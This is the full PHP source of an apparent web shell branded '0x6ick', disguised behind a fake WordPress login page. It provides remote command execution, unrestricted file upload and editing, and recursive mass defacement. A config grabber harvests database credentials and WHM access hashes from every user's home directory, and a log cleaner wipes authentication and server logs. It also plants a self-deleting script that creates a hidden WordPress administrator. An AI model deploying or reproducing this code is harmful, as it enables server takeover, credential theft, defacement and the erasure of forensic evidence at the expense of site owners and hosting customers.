ERROR: Password salah.
'; } echo ' WordPress ‹ Log In

WordPress

' . $login_error_message . '

← Back to WordPress

'; exit(); } } // --- LOGOUT --- if (isset($_GET['logout']) && $_GET['logout'] === 'true') { session_destroy(); header("Location: ?"); // Redirect to login page exit(); } // --- FUNCTIONS --- // Function to sanitize filenames (only prevents directory traversal in filenames) // This does NOT restrict navigation to parent directories. function sanitizeFilename($filename) { return basename($filename); } // Function to execute commands function exe($cmd) { // Attempt to use exec if available, otherwise fallback if (function_exists('exec')) { exec($cmd . ' 2>&1', $output, $return_var); // Redirect stderr to stdout for full output return implode("\n", $output); } elseif (function_exists('shell_exec')) { return shell_exec($cmd); } elseif (function_exists('passthru')) { ob_start(); passthru($cmd); $output = ob_get_clean(); return $output; } elseif (function_exists('system')) { ob_start(); system($cmd); $output = ob_get_clean(); return $output; } return "Command execution disabled."; } // Function to get file permissions function perms($file){ $perms = @fileperms($file); if ($perms === false) return '????'; // Return unknown if fileperms fails if (($perms & 0xC000) == 0xC000) $info = 's'; elseif (($perms & 0xA000) == 0xA000) $info = 'l'; elseif (($perms & 0x8000) == 0x8000) $info = '-'; elseif (($perms & 0x6000) == 0x6000) $info = 'b'; elseif (($perms & 0x4000) == 0x4000) $info = 'd'; elseif (($perms & 0x2000) == 0x2000) $info = 'c'; elseif (($perms & 0x1000) == 0x1000) $info = 'p'; else $info = 'u'; $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } // Function to redirect with messages function redirect_to_current_path($msg_type = '', $msg_text = '', $current_path = '') { global $path; $redirect_path = !empty($current_path) ? $current_path : $path; header("Location: ?path=" . urlencode($redirect_path) . ($msg_type ? "&msg_type=" . urlencode($msg_type) : "") . ($msg_text ? "&msg_text=" . urlencode($msg_text) : "")); exit(); } // --- INITIAL SETUP & MESSAGE HANDLING --- // The $path variable directly takes input from $_GET['path'] without strict safePath validation // allowing full filesystem navigation. $path = isset($_GET['path']) ? $_GET['path'] : getcwd(); $path = str_replace('\\','/',$path); // Normalize slashes for consistency $msg_type = ''; $msg_text = ''; // Check for messages from previous redirects and trigger a clean redirect if (isset($_GET['msg_type']) && isset($_GET['msg_text'])) { $msg_type = htmlspecialchars($_GET['msg_type']); $msg_text = htmlspecialchars($_GET['msg_text']); $current_url_base = strtok($_SERVER["REQUEST_URI"], '?'); $query_params = $_GET; unset($query_params['msg_type']); unset($query_params['msg_text']); $new_query_string = http_build_query($query_params); header("Location: {$current_url_base}?" . $new_query_string); exit(); } // --- HANDLERS FOR ACTIONS --- // Upload File if(isset($_FILES['file_upload'])){ $file_name = sanitizeFilename($_FILES['file_upload']['name']); // Use sanitizeFilename to prevent path traversal in filename if(copy($_FILES['file_upload']['tmp_name'], $path.'/'.$file_name)){ redirect_to_current_path('success', 'UPLOAD SUCCES: ' . $file_name, $path); }else{ redirect_to_current_path('error', 'File Gagal Diupload !!', $path); } } // Mass Deface $mass_deface_results = ''; // Initialize for display later if(isset($_POST['start_mass_deface'])) { $d_dir = $_POST['d_dir']; // Direct path for mass deface directory $d_file = sanitizeFilename($_POST['d_file']); // Sanitize filename $script_content = $_POST['script_content']; // Convert $d_dir to realpath to use as a concrete base for safety check $mass_deface_base_dir = realpath($d_dir); if ($mass_deface_base_dir === false) { // Handle invalid path $_SESSION['feature_output'] = "Error: Direktori Mass Deface tidak valid atau tidak dapat diakses."; redirect_to_current_path('error', 'Mass Deface Gagal.', $path); } // Note: The recursive functions for mass deface still contain checks against $script_root_dir. // This is a safety measure to prevent mass defacing the ENTIRE system if the target directory is a parent. // If you explicitly want to mass deface globally, these checks need to be removed from functions sabun_massal_recursive and sabun_biasa_non_recursive. $script_root_dir = realpath(dirname(__FILE__)); // Get script's root dir for safety checks in mass deface function sabun_massal_recursive($dir_current, $namafile, $isi_script, &$results_arr, $allowed_base_dir_for_deface) { // Renamed param if(is_writable($dir_current)) { $dira = @scandir($dir_current); if ($dira === false) return; foreach($dira as $dirb) { if ($dirb === '.' || $dirb === '..') continue; $dirc = "$dir_current/$dirb"; $lokasi = $dirc.'/'.$namafile; // Modified Safety check: Ensure operation is within the user-specified $allowed_base_dir_for_deface if (strpos(realpath($dirc), $allowed_base_dir_for_deface) !== 0) { // Check if subdirectory is outside the allowed base $results_arr .= "[SKIPPED] " . htmlspecialchars($dirc) . " (outside target base path for mass deface)
"; continue; } if(is_dir($dirc)) { if(is_writable($dirc)) { $results_arr .= "[DONE] " . htmlspecialchars($lokasi) . "
"; file_put_contents($lokasi, $isi_script); sabun_massal_recursive($dirc,$namafile,$isi_script,$results_arr, $allowed_base_dir_for_deface); // Pass new param } else { $results_arr .= "[FAILED] " . htmlspecialchars($dirc) . " (not writable)
"; } } } } else { $results_arr .= "[FAILED] " . htmlspecialchars($dir_current) . " (not writable)
"; } } function sabun_biasa_non_recursive($dir_current, $namafile, $isi_script, &$results_arr, $allowed_base_dir_for_deface) { // Renamed param if(is_writable($dir_current)) { $dira = @scandir($dir_current); if ($dira === false) return; foreach($dira as $dirb) { if ($dirb === '.' || $dirb === '..') continue; $dirc = "$dir_current/$dirb"; $lokasi = $dirc.'/'.$namafile; // Modified Safety check: Ensure operation is within the user-specified $allowed_base_dir_for_deface if (strpos(realpath($dirc), $allowed_base_dir_for_deface) !== 0) { // Check if subdirectory is outside the allowed base $results_arr .= "[SKIPPED] " . htmlspecialchars($dirc) . " (outside target base path for mass deface)
"; continue; } if(is_dir($dirc)) { if(is_writable($dirc)) { $results_arr .= "[DONE] " . htmlspecialchars($dirc . '/' . $namafile) . "
"; file_put_contents($lokasi, $isi_script); } else { $results_arr .= "[FAILED] " . htmlspecialchars($dirc) . " (not writable)
"; } } } } else { $results_arr .= "[FAILED] " . htmlspecialchars($dir_current) . " (not writable)
"; } } if($_POST['tipe_sabun'] == 'mahal') { $mass_deface_results = "
"; sabun_massal_recursive($d_dir, $d_file, $script_content, $mass_deface_results, $mass_deface_base_dir); // Pass new param $mass_deface_results .= "
"; } elseif($_POST['tipe_sabun'] == 'murah') { $mass_deface_results = "
"; sabun_biasa_non_recursive($d_dir, $d_file, $script_content, $mass_deface_results, $mass_deface_base_dir); // Pass new param $mass_deface_results .= "
"; } } // Command execution $cmd_output = ''; if(isset($_POST['do_cmd'])){ $cmd_output = exe($_POST['cmd_input']); } // File/Folder Operations (delete, chmod, rename, edit, create) // These are triggered by 'opt_action' via POST, and 'option' GET parameter if(isset($_GET['option']) && isset($_POST['path_target']) && isset($_POST['opt_action'])){ $target_full_path = $_POST['path_target']; // Direct path for operations $action = $_POST['opt_action']; $current_dir_for_redirect = isset($_GET['path']) ? $_GET['path'] : getcwd(); switch ($action) { // DELETE action handler removed from here case 'chmod_save': if(isset($_POST['perm_value']) && file_exists($target_full_path)){ $perm = octdec($_POST['perm_value']); if(chmod($target_full_path,$perm)){ redirect_to_current_path('success', 'CHANGE PERMISSION SUCCESS !!', $current_dir_for_redirect); } else { redirect_to_current_path('error', 'Change Permission Gagal !!', $current_dir_for_redirect); } } else { redirect_to_current_path('error', 'Target atau izin tidak valid!', $current_dir_for_redirect); } break; case 'rename_save': if(isset($_POST['new_name_value']) && file_exists($target_full_path)){ $new_name_base = sanitizeFilename($_POST['new_name_value']); // Sanitize new filename $new_full_path = dirname($target_full_path).'/'.$new_name_base; if(rename($target_full_path, $new_full_path)){ redirect_to_current_path('success', 'CHANGE NAME SUCCESS !!: ' . $new_name_base, $current_dir_for_redirect); } else { redirect_to_current_path('error', 'Change Name Gagal !!', $current_dir_for_redirect); } } else { redirect_to_current_path('error', 'Target atau nama baru tidak valid!', $current_dir_for_redirect); } break; case 'edit_save': if(isset($_POST['src_content']) && file_exists($target_full_path)){ if(is_writable($target_full_path)) { if(file_put_contents($target_full_path,$_POST['src_content'])){ redirect_to_current_path('success', 'EDIT FILE SUCCESS !!', $current_dir_for_redirect); } else { redirect_to_current_path('error', 'Edit File Gagal !!', $current_dir_for_redirect); } } else { redirect_to_current_path('error', 'File tidak writable!', $current_dir_for_redirect); } } else { redirect_to_current_path('error', 'Target atau konten tidak valid!', $current_dir_for_redirect); } break; } } if(isset($_GET['create_new']) && isset($_POST['create_type']) && isset($_POST['create_name'])) { $create_type = $_POST['create_type']; $create_name = sanitizeFilename($_POST['create_name']); // Sanitize filename $target_path_new = $path . '/' . $create_name; if ($create_type == 'file') { if (file_put_contents($target_path_new, '') !== false) { redirect_to_current_path('success', 'File Baru Berhasil Dibuat: ' . $create_name, $path); } else { redirect_to_current_path('error', 'Gagal membuat file baru!', $path); } } elseif ($create_type == 'dir') { if (mkdir($target_path_new)) { redirect_to_current_path('success', 'Folder Baru Berhasil Dibuat: ' . $create_name, $path); } else { redirect_to_current_path('error', 'Gagal membuat folder baru!', $path); } } } // SQL Client if(isset($_POST['sql_client_submit'])) { $db_host = $_POST['db_host']; $db_user = $_POST['db_user']; $db_pass = $_POST['db_pass']; $db_name = $_POST['db_name']; $sql_query = $_POST['sql_query']; $sql_output = ''; $conn = @mysqli_connect($db_host, $db_user, $db_pass, $db_name); if (!$conn) { $sql_output = "Koneksi Gagal: " . mysqli_connect_error(); } else { $query_result = @mysqli_query($conn, $sql_query); if ($query_result === false) { $sql_output = "Query Gagal: " . mysqli_error($conn); } else { if (is_object($query_result) && method_exists($query_result, 'fetch_assoc')) { // Check if it's a SELECT query result $sql_output .= ""; $sql_output .= ""; $header_printed = false; $first_row = mysqli_fetch_assoc($query_result); if ($first_row) { foreach ($first_row as $key => $value) { $sql_output .= ""; } $sql_output .= ""; $header_printed = true; // Output the first row $sql_output .= ""; foreach ($first_row as $value) { $sql_output .= ""; } $sql_output .= ""; } while ($row = mysqli_fetch_assoc($query_result)) { $sql_output .= ""; foreach ($row as $value) { $sql_output .= ""; } $sql_output .= ""; } if (!$header_printed) { // If no rows were returned at all $sql_output .= ""; // Show affected rows even for SELECT if no rows. } $sql_output .= "
" . htmlspecialchars($key) . "
" . htmlspecialchars($value) . "
" . htmlspecialchars($value) . "
Query executed successfully but returned no rows.
Affected rows: " . mysqli_affected_rows($conn) . "
"; } else { // Non-SELECT query (INSERT, UPDATE, DELETE, etc.) $sql_output = "Query Berhasil Dieksekusi. " . mysqli_affected_rows($conn) . " baris terpengaruh."; } // Only free result if it's an object (i.e., from SELECT queries) if (is_object($query_result)) { mysqli_free_result($query_result); } } mysqli_close($conn); } $_SESSION['feature_output'] = $sql_output; redirect_to_current_path('success', 'SQL Client Selesai.', $path); } // Log Cleaner if(isset($_POST['clean_logs_submit'])) { $log_paths = []; $log_results = ""; // Common Linux Log Paths $log_paths['/var/log/apache2/access.log'] = 'Apache Access Log'; $log_paths['/var/log/apache2/error.log'] = 'Apache Error Log'; $log_paths['/var/log/nginx/access.log'] = 'Nginx Access Log'; $log_paths['/var/log/nginx/error.log'] = 'Nginx Error Log'; $log_paths['/var/log/auth.log'] = 'Authentication Log'; $log_paths['/var/log/syslog'] = 'System Log'; $log_paths['/var/log/messages'] = 'Messages Log'; $log_paths['/var/log/mysql/mysql.log'] = 'MySQL General Log'; $log_paths['/var/log/mysql/error.log'] = 'MySQL Error Log'; $log_paths['/var/log/maillog'] = 'Mail Log'; $log_paths['/var/log/secure'] = 'Secure Log (RHEL/CentOS)'; foreach ($log_paths as $path_to_clean => $log_name) { if (file_exists($path_to_clean) && is_writable($path_to_clean)) { if (file_put_contents($path_to_clean, '') !== false) { $log_results .= htmlspecialchars("[$log_name] ($path_to_clean) -> BERSIH!
"); } else { $log_results .= htmlspecialchars("[$log_name] ($path_to_clean) -> GAGAL DIBERSIHKAN (Izin/Masalah Tulis)
"); } } elseif (file_exists($path_to_clean) && !is_writable($path_to_clean)) { $log_results .= htmlspecialchars("[$log_name] ($path_to_clean) -> TIDAK DAPAT DITULIS (Izin)
"); } else { $log_results .= htmlspecialchars("[$log_name] ($path_to_clean) -> TIDAK DITEMUKAN
"); } } $_SESSION['feature_output'] = $log_results; redirect_to_current_path('success', 'Log Cleaner Selesai.', $path); } // Encode/Decode if(isset($_POST['encode_decode_submit'])) { $text_input = $_POST['encode_decode_text']; $action_type = $_POST['encode_decode_action']; $result_output = ''; switch($action_type) { case 'base64_encode': $result_output = base64_encode($text_input); break; case 'base64_decode': $result_output = base64_decode($text_input); break; case 'url_encode': $result_output = urlencode($text_input); break; case 'url_decode': $result_output = urldecode($text_input); break; case 'md5': $result_output = md5($text_input); break; case 'sha1': $result_output = sha1($text_input); break; case 'str_reverse': $result_output = strrev($text_input); break; default: $result_output = "Invalid action."; } $_SESSION['feature_output'] = htmlspecialchars($result_output); // Use a single session variable for general feature output redirect_to_current_path('success', 'Encode/Decode Selesai.', $path); } // Config Grabber if(isset($_POST['start_config_grab'])){ if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $_SESSION['feature_output'] = "Tidak bisa di gunakan di server windows"; } else { $etc_passwd_content = @file_get_contents("/etc/passwd"); if ($etc_passwd_content === false) { $_SESSION['feature_output'] = "Gagal membaca /etc/passwd. Periksa izin."; } else { $grab_config_output_temp = ""; @mkdir("configs_6ickZone_grabbed", 0777); // Changed directory name @chdir("configs_grabbed_by_0x6ick"); preg_match_all('/(.*?):x:/', $etc_passwd_content, $user_config); foreach($user_config[1] as $user_name_found) { // Changed var name from $user_sanrei $grab_config_paths = array( "/home/$user_name_found/.accesshash" => "WHM-accesshash", "/home/$user_name_found/public_html/wp-config.php" => "Wordpress", "/home/$user_name_found/public_html/configuration.php" => "Joomla", "/home/$user_name_found/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_name_found/public_html/forum/config.php" => "phpBB", "/home/$user_name_found/public_html/sites/default/settings.php" => "Drupal", "/home/$user_name_found/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_name_found/public_html/app/etc/local.xml" => "Magento", "/home/$user_name_found/public_html/admin/config.php" => "OpenCart", "/home/$user_name_found/public_html/application/config/database.php" => "Ellislab", "/home/$user_name_found/public_html/vb/includes/config.php" => "Vbulletin", "/home/$user_name_found/public_html/includes/config.php" => "Vbulletin", ); foreach($grab_config_paths as $config_path_abs => $config_type_name) { $ambil_config = @file_get_contents($config_path_abs); if($ambil_config != '') { $grab_config_output_temp .= htmlspecialchars("$config_path_abs -> FOUND ($config_type_name)
"); @file_put_contents("$user_name_found-$config_type_name.txt", $ambil_config); } } } if (empty($grab_config_output_temp)) { $grab_config_output_temp = "Tidak ada konfigurasi yang ditemukan."; } else { $grab_config_output_temp .= "
Konfigurasi disimpan di folder 'configs_grabbed_by_0x6ick' di direktori shell."; } @chdir($path); // Return to original directory $_SESSION['feature_output'] = $grab_config_output_temp; } } redirect_to_current_path('success', 'Config Grabber Selesai.', $path); } // Auto Create WordPress Admin if(isset($_POST['wp_admin_submit'])) { $wp_root_path = $_POST['wp_root_path']; // Get WordPress root path $wp_username = sanitizeFilename($_POST['wp_username']); $wp_password = $_POST['wp_password']; $wp_email = $_POST['wp_email']; $admin_script_name = "0x6ick_wp_admin_" . uniqid() . ".php"; // Changed filename $admin_script_path = $wp_root_path . '/' . $admin_script_name; $admin_code = " '" . addslashes($wp_username) . "', 'user_pass' => '" . addslashes($wp_password) . "', 'user_email' => '" . addslashes($wp_email) . "', 'role' => 'administrator' )); if (!is_wp_error(\$user_id)) { echo 'Administrator WordPress ' . \$user_id . ' (' . \"" . addslashes($wp_username) . "\" ) berhasil dibuat.'; } else { echo 'Gagal membuat administrator WordPress: ' . \$user_id->get_error_message(); } //self // Attempt to delete self unlink(__FILE__); } ?>"; if (file_put_contents($admin_script_path, $admin_code) !== false) { // Execute the script by accessing its URL using cURL for robustness $scheme = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http"; $host = $_SERVER['HTTP_HOST']; // Construct the URL to the temporary WP admin creation script $clean_wp_root_path = str_replace(realpath($_SERVER['DOCUMENT_ROOT']), '', realpath($wp_root_path)); $temp_script_url = "{$scheme}://{$host}" . $clean_wp_root_path . "/{$admin_script_name}"; $temp_script_url = str_replace('//','/',$temp_script_url); // Fix double slashes $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $temp_script_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Follow redirects if any curl_setopt($ch, CURLOPT_TIMEOUT, 10); // Max 10 seconds to execute script $result = curl_exec($ch); $curl_error = curl_error($ch); curl_close($ch); if ($curl_error) { $_SESSION['feature_output'] = "cURL Error executing WP Admin script: " . htmlspecialchars($curl_error); } else { $_SESSION['feature_output'] = htmlspecialchars($result); } // Try to delete the script right after execution if (file_exists($admin_script_path)) { unlink($admin_script_path); // Attempt immediate delete } redirect_to_current_path('success', 'Proses Buat Admin WordPress Selesai. Cek output.', $path); } else { redirect_to_current_path('error', 'Gagal membuat file script admin di ' . htmlspecialchars($wp_root_path) . '. Periksa izin tulis.', $path); } } // Ping Tool if(isset($_POST['ping_submit'])) { $target_host = $_POST['ping_target']; $ping_count = intval($_POST['ping_count']); if ($ping_count <= 0 || $ping_count > 10) $ping_count = 4; // Default to 4 pings $ping_cmd = "ping -c {$ping_count} " . escapeshellarg($target_host); // Use escapeshellarg for safety $ping_output = exe($ping_cmd); $_SESSION['feature_output'] = htmlspecialchars($ping_output); redirect_to_current_path('success', 'Ping Selesai.', $path); } // Port Scanner if(isset($_POST['portscan_submit'])) { $target_host = $_POST['portscan_target']; $ports_to_scan = $_POST['ports_to_scan']; // e.g., "80,443,21-23" $scan_output = ""; // Prioritize nmap if available, otherwise netcat if (function_exists('exec') || function_exists('shell_exec')) { // Check if command execution is generally enabled if (trim(exe('which nmap')) !== '') { // Check if nmap is installed $scan_cmd = "nmap -p " . escapeshellarg($ports_to_scan) . " " . escapeshellarg($target_host); $scan_output = exe($scan_cmd); } elseif (trim(exe('which nc')) !== '') { // Check if netcat is installed $ports_array = explode(',', $ports_to_scan); foreach ($ports_array as $port_range) { if (strpos($port_range, '-') !== false) { // Handle port ranges list($start_port, $end_port) = explode('-', $port_range); for ($p = (int)$start_port; $p <= (int)$end_port; $p++) { $nc_cmd = "nc -zvn " . escapeshellarg($target_host) . " " . escapeshellarg($p) . " 2>&1"; $scan_output .= exe($nc_cmd) . "\n"; } } else { // Handle single ports $nc_cmd = "nc -zvn " . escapeshellarg($target_host) . " " . escapeshellarg($port_range) . " 2>&1"; $scan_output .= exe($nc_cmd) . "\n"; } } $scan_output = "Nmap not found, using Netcat. Output might be verbose:\n" . $scan_output; } else { $scan_output = "Error: Nmap or Netcat not found on server."; } } else { $scan_output = "Error: Command execution functions are disabled."; } $_SESSION['feature_output'] = htmlspecialchars($scan_output); redirect_to_current_path('success', 'Port Scan Selesai.', $path); } // DNS Lookup if(isset($_POST['dns_lookup_submit'])) { $target_domain = $_POST['dns_lookup_target']; $record_type = $_POST['dns_record_type']; // e.g., A, MX, NS $dns_output = ""; if (trim(exe('which dig')) !== '') { // Prioritize dig $dns_cmd = "dig " . escapeshellarg($target_domain) . " " . escapeshellarg($record_type); $dns_output = exe($dns_cmd); } elseif (trim(exe('which nslookup')) !== '') { // Fallback to nslookup $dns_cmd = "nslookup -type=" . escapeshellarg($record_type) . " " . escapeshellarg($target_domain); $dns_output = exe($dns_cmd); } else { $dns_output = "Error: dig or nslookup not found on server."; } $_SESSION['feature_output'] = htmlspecialchars($dns_output); redirect_to_current_path('success', 'DNS Lookup Selesai.', $path); } // Whois Lookup if(isset($_POST['whois_submit'])) { $target_domain = $_POST['whois_target']; $whois_output = ""; if (trim(exe('which whois')) !== '') { $whois_cmd = "whois " . escapeshellarg($target_domain); $whois_output = exe($whois_cmd); } else { $whois_output = "Error: whois command not found on server."; } $_SESSION['feature_output'] = htmlspecialchars($whois_output); redirect_to_current_path('success', 'Whois Lookup Selesai.', $path); } ?> <?php echo $title; ?>

{$msg_text}"; } // --- DISPLAY FEATURE OUTPUTS --- // Handler to clear feature output when Home or Clear button is clicked // This handler must be BEFORE the feature_output-box display if (isset($_GET['clear_output']) && $_GET['clear_output'] === 'true') { unset($_SESSION['feature_output']); // Redirect to clear clear_output param from URL $current_url_base = strtok($_SERVER["REQUEST_URI"], '?'); $query_params = $_GET; unset($query_params['clear_output']); $new_query_string = http_build_query($query_params); header("Location: {$current_url_base}?" . $new_query_string); exit(); } if (isset($_SESSION['feature_output']) && !empty($_SESSION['feature_output'])) { echo '
'; echo '

Feature Output Clear:

'; // Added Clear button echo '
' . $_SESSION['feature_output'] . '
'; //setelah clear klik logonya y echo '
'; } ?>
User / IP :
Host / Server :
Web Server :
System :
PHP Version :
Current Path :
Disk Free : GB
Load Average : number_format($v, 2), $load)); ?>
Server Time :
User Agent :
About | Command | Upload | Mass Deface | Create | Encode/Decode | Config Grabber | WP Admin SQL Client | Log Cleaner | Ping | Port Scan | DNS Lookup | Whois
[Logout]
: /'; // Link to root (Linux) $current_built_path = ''; foreach($paths_array as $id=>$pat){ if(empty($pat)) continue; $current_built_path .= '/' . $pat; echo ''.$pat.'/'; } ?>
'; echo "

Execute Command

"; echo "
"; echo " "; echo " "; echo "
"; if(isset($_POST['do_cmd'])) { $cmd_output = exe($_POST['cmd_input']); echo "
".htmlspecialchars($cmd_output)."
"; } echo ''; break; case 'upload_form': $show_file_list = false; echo '
'; echo '

Upload File

'; echo '
'; echo '
'; break; case 'mass_deface_form': $show_file_list = false; echo '
'; echo '

Mass Deface

'; if (!empty($mass_deface_results)) { echo "

Mass Deface Results:

"; echo "
".$mass_deface_results."
"; } echo "
Tipe Mass:
BiasaMassal

Folder:

Filename:

Index File:

"; echo '
'; break; case 'create_form': $show_file_list = false; echo '
'; echo '

Create New File / Folder

'; echo '
Create:

Name:

Cancel
'; echo '
'; break; case 'encoder_decoder_form': $show_file_list = false; echo '
'; echo '

Encoder / Decoder

'; // Output handled by general display block above echo '


'; echo '
'; break; case 'config_grabber_form': $show_file_list = false; echo '
'; echo '

Config Grabber

'; // Output handled by general display block above echo '
'; echo '
'; break; case 'wp_admin_form': $show_file_list = false; echo '
'; echo '

WordPress Admin Creator

'; // Output handled by general display block above echo '
WordPress Root Path (e.g., /home/user/public_html/wordpress):


New Username:


New Password:


New Email:


'; echo '
'; break; case 'sql_client_form': $show_file_list = false; echo '
'; echo '

SQL Client

'; // Output handled by general display block above echo '
DB Host (e.g., localhost):


DB User:


DB Pass:


DB Name:


SQL Query:


'; echo '
'; break; case 'log_cleaner_form': $show_file_list = false; echo '
'; echo '

Log Cleaner

'; // Output handled by general display block above echo '

Peringatan: Membersihkan log bisa menghapus jejak penting.


'; echo '
'; break; case 'ping_form': // Ping Tool Form $show_file_list = false; echo '
'; echo '

Ping Tool

'; echo '
Host/IP Target:


Jumlah Ping (opsional, max 10):


'; // Changed name to ping_submit if(isset($_POST['ping_submit'])) { // Handle POST here directly $target_host = $_POST['ping_target']; $ping_count = intval($_POST['ping_count']); if ($ping_count <= 0 || $ping_count > 10) $ping_count = 4; $ping_cmd = "ping -c {$ping_count} " . escapeshellarg($target_host); $ping_output = exe($ping_cmd); echo "
".htmlspecialchars($ping_output)."
"; } echo '
'; break; case 'portscan_form': // Port Scanner Form $show_file_list = false; echo '
'; echo '

Port Scanner

'; echo '
Host/IP Target:


Port(s) (e.g., 80,443,21-23):


'; // Changed name to portscan_submit if(isset($_POST['portscan_submit'])) { // Handle POST here directly $target_host = $_POST['portscan_target']; $ports_to_scan = $_POST['ports_to_scan']; $scan_output = ""; if (function_exists('exec') || function_exists('shell_exec')) { if (trim(exe('which nmap')) !== '') { $scan_cmd = "nmap -p " . escapeshellarg($ports_to_scan) . " " . escapeshellarg($target_host); $scan_output = exe($scan_cmd); } elseif (trim(exe('which nc')) !== '') { $ports_array = explode(',', $ports_to_scan); foreach ($ports_array as $port_range) { if (strpos($port_range, '-') !== false) { list($start_port, $end_port) = explode('-', $port_range); for ($p = (int)$start_port; $p <= (int)$end_port; $p++) { $nc_cmd = "nc -zvn " . escapeshellarg($target_host) . " " . escapeshellarg($p) . " 2>&1"; $scan_output .= exe($nc_cmd) . "\n"; } } else { $nc_cmd = "nc -zvn " . escapeshellarg($target_host) . " " . escapeshellarg($port_range) . " 2>&1"; $scan_output .= exe($nc_cmd) . "\n"; } } $scan_output = "Nmap not found, using Netcat. Output might be verbose:\n" . $scan_output; } else { $scan_output = "Error: Nmap or Netcat not found on server."; } } else { $scan_output = "Error: Command execution functions are disabled."; } echo "
".htmlspecialchars($scan_output)."
"; } echo '
'; break; case 'dns_lookup_form': // DNS Lookup Form $show_file_list = false; echo '
'; echo '

DNS Lookup

'; echo '
Domain Target:


Record Type:


'; // Changed name to dns_lookup_submit if(isset($_POST['dns_lookup_submit'])) { // Handle POST here directly $target_domain = $_POST['dns_lookup_target']; $record_type = $_POST['dns_record_type']; $dns_output = ""; if (trim(exe('which dig')) !== '') { $dns_cmd = "dig " . escapeshellarg($target_domain) . " " . escapeshellarg($record_type); $dns_output = exe($dns_cmd); } elseif (trim(exe('which nslookup')) !== '') { $dns_cmd = "nslookup -type=" . escapeshellarg($record_type) . " " . escapeshellarg($target_domain); $dns_output = exe($dns_cmd); } else { $dns_output = "Error: dig or nslookup not found on server."; } echo "
".htmlspecialchars($dns_output)."
"; } echo '
'; break; case 'whois_form': // Whois Form $show_file_list = false; echo '
'; echo '

Whois Lookup

'; echo '
Domain Target:


'; // Changed name to whois_submit if(isset($_POST['whois_submit'])) { // Handle POST here directly $target_domain = $_POST['whois_target']; $whois_output = ""; if (trim(exe('which whois')) !== '') { $whois_cmd = "whois " . escapeshellarg($target_domain); $whois_output = exe($whois_cmd); } else { $whois_output = "Error: whois command not found on server."; } echo "
".htmlspecialchars($whois_output)."
"; } echo '
'; break; case 'download_file': //gda dwnld. $show_file_list = false; // Tetap set false agar tidak kembali ke file listing echo '
'; echo '

Fitur Download Dinonaktifkan.

'; echo '

Kembali ke Explorer

'; echo '
'; break; case 'delete': // New: Delete handler using GET // !!! Awokwok gajadi !!! $show_file_list = false; // Tetap set false agar tidak kembali ke file listing echo '
'; echo '

Fitur Delete Dinonaktifkan.

'; echo '

Kembali ke Explorer

'; echo '
'; break; case 'view_file': $show_file_list = false; $file_to_view = $_GET['target_file']; echo '
'; echo "

Viewing: ".htmlspecialchars(basename($file_to_view))."

"; if (is_file($file_to_view) && is_readable($file_to_view)) { echo(''); } else { echo '

File not found or not readable!

'; } echo '

Back to Explorer

'; echo '
'; break; case 'edit_form': $show_file_list = false; $file_to_edit = $_GET['target_file']; echo '
'; echo "

Editing: ".htmlspecialchars(basename($file_to_edit))."

"; if (is_file($file_to_edit) && is_readable($file_to_edit)) { echo '

CANCEL
'; } else { echo '

File not found or not readable for editing!

'; echo '

Back to Explorer

'; } echo '
'; break; case 'rename_form': $show_file_list = false; $file_to_rename = $_GET['target_file']; echo '
'; echo "

Rename: ".htmlspecialchars(basename($file_to_rename))."

"; echo '
New Name :

CANCEL
'; echo '
'; break; case 'chmod_form': $show_file_list = false; $file_to_chmod = $_GET['target_file']; echo '
'; echo "

Chmod: ".htmlspecialchars(basename($file_to_chmod))."

"; $current_perms = file_exists($file_to_chmod) ? substr(sprintf('%o', @fileperms($file_to_chmod)), -4) : '0000'; echo '
Permission :

CANCEL
'; echo '
'; break; } } // File List Table (Only displayed if no specific action form is active) if ($show_file_list) { $scandir_items = @scandir($path); if ($scandir_items === false) { echo "
Failed to read directory: " . htmlspecialchars($path) . "
"; $scandir_items = []; } echo '
'; usort($scandir_items, function($a, $b) use ($path) { $pathA = $path . '/' . $a; $pathB = $path . '/' . $b; $is_dir_A = is_dir($pathA); $is_dir_B = is_dir($pathB); if ($is_dir_A && !$is_dir_B) return -1; if (!$is_dir_A && $is_dir_B) return 1; return strcasecmp($a, $b); }); foreach($scandir_items as $item){ if($item == '.') continue; // Skip . (current directory) $full_item_path = $path.'/'.$item; $display_name = htmlspecialchars($item); $encoded_full_item_path = urlencode($full_item_path); echo ""; } elseif(is_dir($full_item_path)) { echo " $display_name"; } else { echo " $display_name"; } echo ""; echo ""; echo ""; } echo '
Name
Size
Perm
Options
"; if($item == '..') { // Up one folder $parent_dir = dirname($path); echo " $display_name
"; echo (is_file($full_item_path) ? round(filesize($full_item_path)/1024,3).' KB' : '--'); echo "
"; if(file_exists($full_item_path)) { $perms_str = perms($full_item_path); if(is_writable($full_item_path)) echo ''; // Writable is green elseif(!is_readable($full_item_path)) echo ''; // Non-readable is red echo $perms_str; if(is_writable($full_item_path) || !is_readable($full_item_path)) echo ''; } else { echo '????'; } echo "
"; echo "
'; } ?>


Coded With 💗 by